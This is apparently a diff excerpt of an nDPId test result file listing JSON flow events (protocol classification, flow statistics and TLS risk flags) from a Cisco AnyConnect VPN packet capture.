00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2441,"flow_first_seen":1569687268746,"flow_last_seen":1569687289262,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1469,"flow_tot_l4_payload_len":789975,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1569687241656,"flow_last_seen":1569687287122,"flow_idle_time":120000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":1920,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
@@ -347,45 +347,45 @@
00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261034,"flow_last_seen":1569687261050,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687241422,"flow_last_seen":1569687286460,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":2200,"flow_avg_l4_payload_len":73,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687241422,"flow_last_seen":1569687286460,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":2200,"flow_avg_l4_payload_len":73,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245295,"flow_last_seen":1569687245320,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1569687267797,"flow_last_seen":1569687267821,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
01168{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1569687260591,"flow_last_seen":1569687262892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":9167,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1569687267797,"flow_last_seen":1569687267821,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
01168{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1569687260591,"flow_last_seen":1569687262892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":9167,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687247596,"flow_last_seen":1569687248620,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260772,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00912{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687245379,"flow_last_seen":1569687245725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8058,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1569687245688,"flow_last_seen":1569687268830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22452,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
01035{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1569687267035,"flow_last_seen":1569687288923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21688,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687268339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687268339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687267453,"flow_last_seen":1569687267455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687267453,"flow_last_seen":1569687267455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
